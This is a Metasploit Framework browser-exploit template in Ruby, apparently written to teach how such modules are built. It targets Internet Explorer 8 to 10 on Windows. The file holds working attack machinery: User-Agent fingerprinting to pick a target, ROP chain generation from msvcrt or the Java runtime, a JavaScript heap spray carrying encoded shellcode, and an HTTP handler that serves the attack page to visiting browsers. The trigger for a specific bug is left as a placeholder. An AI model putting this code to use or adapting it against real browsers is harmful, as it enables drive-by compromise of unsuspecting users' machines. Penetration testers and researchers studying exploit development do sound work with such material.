##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'


###
#
# This exploit sample demonstrates how a typical browser exploit is written using commonly
# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
#
###
class Metasploit4 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb
	include Msf::Exploit::Remote::BrowserAutopwn

	# Set :classid and :method for ActiveX exploits. For example:
	# :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
	# :method     => "SetShapeNodeType",
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "8.0",
		:ua_maxver  => "10.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:rank       => NormalRanking
	})

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Module Name",
			'Description'    => %q{
				This template covers IE8/9/10, and uses the user-agent HTTP header to detect
				the browser version.  Please note IE8 and newer may emulate an older IE version
				in compatibility mode, in that case the module won't be able to detect the
				browser correctly.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'sinn3r' ],
			'References'     =>
				[
					[ 'URL', 'http://metasploit.com' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
					[ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
					[ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
					[ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
					[ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
				],
			'Payload'        =>
				{
					'BadChars'        => "\x00",  # js_property_spray
					'StackAdjustment' => -3500
				},
			'Privileged'     => false,
			'DisclosureDate' => "Apr 1 2013",
			'DefaultTarget'  => 0))
	end

	def get_target(agent)
		return target if target.name != 'Automatic'

		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

		ie_name = "IE #{ie}"

		case nt
		when '5.1'
			os_name = 'Windows XP SP3'
		when '6.0'
			os_name = 'Windows Vista'
		when '6.1'
			os_name = 'Windows 7'
		when '6.2'
			os_name = 'Windows 8'
		end

		targets.each do |t|
			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
				return t
			end
		end

		nil
	end

	def get_payload(t)
		stack_pivot = "\x41\x42\x43\x44"
		code        = payload.encoded

		case t['Rop']
		when :msvcrt
			print_status("Using msvcrt ROP")
			rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})

		else
			print_status("Using JRE ROP")
			rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
		end

		rop_payload
	end


	def get_html(t)
		js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
		html = %Q|
			<script>
			#{js_property_spray}

			var s = unescape("#{js_p}");
			sprayHeap({shellcode:s});
			</script>
		|

		html.gsub(/^\t\t/, '')
	end


	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		print_status("Requesting: #{request.uri}")

		target = get_target(agent)
		if target.nil?
			print_error("Browser not supported, sending 404: #{agent}")
			send_not_found(cli)
			return
		end

		print_status("Target selected as: #{target.name}")
		html = get_html(target)
		send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
	end
end